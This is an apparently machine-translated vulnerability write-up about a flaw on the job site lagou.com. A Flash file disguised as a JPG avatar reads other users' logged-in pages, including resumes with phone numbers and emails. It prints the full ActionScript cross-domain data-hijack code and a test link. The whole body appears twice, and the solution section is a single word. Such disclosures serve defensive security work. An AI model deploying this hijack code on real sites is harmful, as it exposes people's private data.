A problem occurs on the lagu network, causing other users' resumes to be downloaded (sensitive data such as tokens can be obtained)
Today, I saw a photo on the Internet !!! 40 k monthly salary !!!! Here, I can only go to the web site to get a feel of the 40 k monthly salary, and then find something wrong ^ _ ^
Register a user at lagou.com first!
Then upload an Avatar:
You can find that the Avatar is broken. What is the Avatar. Is a flash csrf file renamed as jpg!
Xiao Tao asked: why not use the swf suffix?
Instructor du: I also want to know, but have you ever seen a portrait picture where the image can be uploaded to swf?
Look at the flash code:
package com.powerflasher.SampleApp {import flash.external.ExternalInterface;import flash.display.Sprite;import flash.display.Sprite; import flash.events.Event; import flash.net.URLLoader; import flash.net.URLRequest; import flash.text.TextField; import flash.text.TextFieldAutoSize; import flash.xml.*; import flash.events.IOErrorEvent;import flash.events.*; import flash.net.*;/** * @author User */ public class CrossDomainDataHijack extends Sprite { private var loader:URLLoader; public function CrossDomainDataHijack() { loader = new URLLoader(); configureListeners(loader);var target:String = root.loaderInfo.parameters.input; var request:URLRequest = new URLRequest(target); try { loader.load(request); } catch (error:Error) { sendDatatoJS("Unable to load requested document; Error: " + error.getStackTrace()); } } private function configureListeners(dispatcher:IEventDispatcher):void { dispatcher.addEventListener(Event.COMPLETE, completeHandler); dispatcher.addEventListener(Event.OPEN, openHandler); dispatcher.addEventListener(ProgressEvent.PROGRESS, progressHandler); dispatcher.addEventListener(SecurityErrorEvent.SECURITY_ERROR, securityErrorHandler); dispatcher.addEventListener(HTTPStatusEvent.HTTP_STATUS, httpStatusHandler); dispatcher.addEventListener(IOErrorEvent.IO_ERROR, ioErrorHandler); } private function completeHandler(event:Event):void { var loader:URLLoader = URLLoader(event.target); //trace("completeHandler: " + loader.data); sendDatatoJS("completeHandler: " + loader.data); } private function openHandler(event:Event):void { //trace("openHandler: " + event);sendDatatoJS("openHandler: " + event); } private function progressHandler(event:ProgressEvent):void { //trace("progressHandler loaded:" + event.bytesLoaded + " total: " + event.bytesTotal);sendDatatoJS("progressHandler loaded:" + event.bytesLoaded + " total: " + event.bytesTotal); } private function securityErrorHandler(event:SecurityErrorEvent):void { //trace("securityErrorHandler: " + event);sendDatatoJS("securityErrorHandler: " + event); } private function httpStatusHandler(event:HTTPStatusEvent):void { //trace("httpStatusHandler: " + event);sendDatatoJS("httpStatusHandler: " + event); } private function ioErrorHandler(event:IOErrorEvent):void { //trace("ioErrorHandler: " + event);sendDatatoJS("ioErrorHandler: " + event); }private function sendDatatoJS(data:String):void{ trace(data);ExternalInterface.call("sendToJavaScript", data);} }}
Now let's see if this picture can be viewed by all users. If you can only view it, You can only play with it...
View image address:
Check whether other users can access the service:
It seems that you don't have to play with it. Now let's test if we can get the content of any lagou.com page!
First, you can obtain a page that requires user permissions, such as the page set for your resume:
On this page, we can see if we can get the source code of this page:
You can see that the flash Address and the page to GET have returned values, including the mobile phone number and email address!
Let's figure out:
We can see that it is indeed our resume page. The Source Code also contains the resume download link:
This link can be accessed by anyone ....
Test link: http://jsbin.com/ladujohifika/2
The contents of the http://www.lagou.com/resume/preview.html are printed as long as you access
Register a user at lagou.com first!
Then upload an Avatar:
You can find that the Avatar is broken. What is the Avatar. Is a flash csrf file renamed as jpg!
Xiao Tao asked: why not use the swf suffix?
Instructor du: I also want to know, but have you ever seen a portrait picture where the image can be uploaded to swf?
Look at the flash code:
package com.powerflasher.SampleApp {import flash.external.ExternalInterface;import flash.display.Sprite;import flash.display.Sprite; import flash.events.Event; import flash.net.URLLoader; import flash.net.URLRequest; import flash.text.TextField; import flash.text.TextFieldAutoSize; import flash.xml.*; import flash.events.IOErrorEvent;import flash.events.*; import flash.net.*;/** * @author User */ public class CrossDomainDataHijack extends Sprite { private var loader:URLLoader; public function CrossDomainDataHijack() { loader = new URLLoader(); configureListeners(loader);var target:String = root.loaderInfo.parameters.input; var request:URLRequest = new URLRequest(target); try { loader.load(request); } catch (error:Error) { sendDatatoJS("Unable to load requested document; Error: " + error.getStackTrace()); } } private function configureListeners(dispatcher:IEventDispatcher):void { dispatcher.addEventListener(Event.COMPLETE, completeHandler); dispatcher.addEventListener(Event.OPEN, openHandler); dispatcher.addEventListener(ProgressEvent.PROGRESS, progressHandler); dispatcher.addEventListener(SecurityErrorEvent.SECURITY_ERROR, securityErrorHandler); dispatcher.addEventListener(HTTPStatusEvent.HTTP_STATUS, httpStatusHandler); dispatcher.addEventListener(IOErrorEvent.IO_ERROR, ioErrorHandler); } private function completeHandler(event:Event):void { var loader:URLLoader = URLLoader(event.target); //trace("completeHandler: " + loader.data); sendDatatoJS("completeHandler: " + loader.data); } private function openHandler(event:Event):void { //trace("openHandler: " + event);sendDatatoJS("openHandler: " + event); } private function progressHandler(event:ProgressEvent):void { //trace("progressHandler loaded:" + event.bytesLoaded + " total: " + event.bytesTotal);sendDatatoJS("progressHandler loaded:" + event.bytesLoaded + " total: " + event.bytesTotal); } private function securityErrorHandler(event:SecurityErrorEvent):void { //trace("securityErrorHandler: " + event);sendDatatoJS("securityErrorHandler: " + event); } private function httpStatusHandler(event:HTTPStatusEvent):void { //trace("httpStatusHandler: " + event);sendDatatoJS("httpStatusHandler: " + event); } private function ioErrorHandler(event:IOErrorEvent):void { //trace("ioErrorHandler: " + event);sendDatatoJS("ioErrorHandler: " + event); }private function sendDatatoJS(data:String):void{ trace(data);ExternalInterface.call("sendToJavaScript", data);} }}
Now let's see if this picture can be viewed by all users. If you can only view it, You can only play with it...
View image address:
Check whether other users can access the service:
It seems that you don't have to play with it. Now let's test if we can get the content of any lagou.com page!
First, you can obtain a page that requires user permissions, such as the page set for your resume:
On this page, we can see if we can get the source code of this page:
You can see that the flash Address and the page to GET have returned values, including the mobile phone number and email address!
Let's figure out:
We can see that it is indeed our resume page. The Source Code also contains the resume download link:
This link can be accessed by anyone ....
Test link: http://jsbin.com/ladujohifika/2
The contents of the http://www.lagou.com/resume/preview.html are printed as long as you access
Test Page code:
Solution:
Filter